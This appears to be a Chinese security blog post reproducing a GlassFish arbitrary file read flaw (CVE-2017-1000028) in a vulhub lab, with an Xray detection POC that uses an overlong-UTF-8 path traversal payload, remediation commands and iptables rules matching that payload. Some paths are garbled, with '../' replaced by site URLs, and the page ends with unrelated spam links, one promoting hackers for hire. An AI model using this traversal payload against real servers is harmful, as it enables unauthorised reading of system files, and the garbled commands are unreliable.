GlassFish 任意文件读取漏洞复现

访客3年前黑客文章304

GlassFish 任意文件读取漏洞

漏洞原理

glassfish 是一款 java 编写的跨平台的开源的应用服务器。

java语言中会把 解析为 ,最后转义为ASCCII字符的(点)。利用 来向上跳转,达到目录穿越、任意文件读取的效果。所以 glassfish 这个 poc 实际上就是//https://www.freebuf.com/articles/etc/passwd。

影响版本:

< 4.1.1(不含 4.1.1)

漏洞复现

如下测试环境借助 vulhub 的 docker 镜像,附上 P 师傅的链接:https://github.com/vulhub/vulhub?

编译、运行测试环境,本环境超级管理员密码在 中设置,默认为 ,在4848端口利用该密码可以登录管理员账户。

docker-compose up -d

环境运行后,访问 和 即可查看 web 页面。其中,8080 端口是网站内容,4848 端口是 GlassFish 管理中心。

1608813484_5fe48bac317fb634489de.png!small?1608813483816

无需登录,直接访问 ,发现已成功读取 内容:

1608813535_5fe48bdf14e8708d27904.png!small?1608813534445

POC & EXP

如下是 Xray 的 POC,其只穿越了上级目录,检测了版本信息,不涉及敏感信息,但同样也验证了漏洞存在。

name: poc-yaml-glassfish-cve-2017-1000028-lfi
rules:
  - method: GET
    path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
    follow_redirects: true
    expression: |
      response.status==200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:")
detail:
  version: <4.1.0
  author: sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0

1608814260_5fe48eb405664e92282ca.png!small?1608814259302

漏洞修复

1. 关闭远程管理关闭远程管理,关闭后只允许本地访问,会提示要求输入用户名和密码,开发环境或者对服务器安全要求较高的环境可以选择这么做,修改该设置后应该重启 GlassFish 服务

https://www.freebuf.com/articles/web/asadmin change-admin-password https://www.freebuf.com/articles/web/asadmin disable-secure-admin https://www.freebuf.com/articles/web/asadmin stop-domain https://www.freebuf.com/articles/web/asadmin start-domain asadmin.bat change-admin-password asadmin.bat disable-secure-admin asadmin.bat stop-domain asadmin.bat start-domain

需要注意的是,关闭远程访问只能禁用远程 login 登录,但是攻击 url 还是可以访问,任意文件读取依然存在

2. IPtables 规则

iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '..\%c0\%af' -j DROP  
iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '\%c0\%ae/' -j DROP  
iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string 'https://www.freebuf.com/articles/' -j DROP   
//该规则无法防御HTTPS SSL方案

3. 禁用 web.xml theme 映射\glassfish4\glassfish\lib\install\applications__admingui\WEB-INF\web.xml

<!--
    <servlet-mapping>
        <servlet-name>ThemeServlet</servlet-name>
        <url-pattern>/theme/*</url-pattern>
    </servlet-mapping>
-->

重启 glassfish 后生效

参考资料

  1. https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904

  2. https://vulhub.org/#/environments/gitlab/CVE-2016-9086/





相关文章

砸钱买来的用户没剩几个,你的问题可能出在这里

砸钱买来的用户没剩几个,你的问题可能出在这里

不知道列位看官泛泛是否看数据,是否知道本身公司的预算都花哪儿去了?假如泛泛不看数据,那么接下来你需警觉了:因为你花大钱换来的用户最后没剩几个。原因出在哪?请见下文分晓。 “90%的流量未注册乐成,90...

高考结束的那天说说朋友圈2018 高考结束的那天只能怀念

高考结束的那天说说朋友圈2018 高考结束的那天只能怀念

2018今年高考就需要完毕,这短短二天会走远的迅速,下边的我就产生:高考后的那一天说说微信朋友圈2018 高考后的那一天能怀恋。 高考后的那一天说说 今年高考前炎热的课室,认为会很难以释怀,可...

黑客钱财,黑客能盗微信支付记录,黑客163邮箱密码破解

除了V PN 署理僵尸网络,“速浪”宗族在流量暗刷方面也是前科累累。 如上图,毒霸安全团队在2019年8月份曾监控到“速浪输入法”经过云控下载“Y Y 直播”暗刷木马,经过后台登陆僵尸粉丝账号,模仿操...

360安全卫士如何取消自动升级,360安全卫士取消自动升级的步骤

诸位才下手360安全护卫的各位朋友,假如你要不容易撤消在线升级得话,就来下面学习一下360安全护卫撤消在线升级的详尽流程吧,期待能够协助到大伙儿。       诸位才下手360安全护卫的各位朋友,假如...

网上找的黑客能信吗-真正黑客的联系方式(无前期费用黑客追款联系方式)

网上找的黑客能信吗-真正黑客的联系方式(无前期费用黑客追款联系方式)

网上找的黑客能信吗相关问题 怎么样找到真正的黑客相关问题 如何去除黑客 网警为啥不抓黑客(网警抓人) 黑客是怎么...

一般纳税人怎么报税步骤(超完整的流程分享)

  伴随着我国税制改革的逐步完善,公司税务申报的申请办理也更加严苛。不管身处中小企业,還是处于大中型集团公司,税务申报全是财会人员的日常工作中之一。针对财务会计“老湿机”来讲,也许它是一件再简易但是的...